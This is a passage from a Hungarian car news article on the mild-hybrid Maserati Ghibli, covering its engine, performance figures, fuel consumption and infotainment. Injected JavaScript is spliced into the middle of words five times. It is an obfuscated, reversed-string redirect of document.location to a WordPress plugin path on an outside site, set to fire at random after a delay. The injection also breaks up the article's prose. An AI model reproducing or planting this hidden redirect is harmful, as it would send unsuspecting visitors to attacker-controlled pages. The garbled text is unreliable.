Kétliteres, soros négyhengeres benzines turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torját 48 voltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos generátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral, valamint elektromos kompresszorral egészítette ki a Maserati. Az eredmény egy 330 lóerős, 450 Nm nyomatékú hajtáslánc, amely 255 km/óra végsebességre képes, és 5,7 másodperc alatt röpíti 100 km/órára a nehéz autót. Mindazonáltal nem is olyan nehéz a hibrid Ghibli: a hajtáslánc mintegy 80 kilogrammal kevesebbet nyom, mint a Maserati Ghibli Diesel (275 LE, 600 Nm, 6,3 mp 0-100 km/óra, 250 km/óra) hajtáslánca. A közvetlen benzinbefecskendezéses motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor WLTP-konform átlagfogyasztása 8,5-9,6 l/100 km. A mild hibrid hajtáslánc mellett komplett kapcsolódási programot is bevezetett a Maserati, amely Android Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to alapú multimédia rendszert, akár 10,1 colos…
- Hirdetés -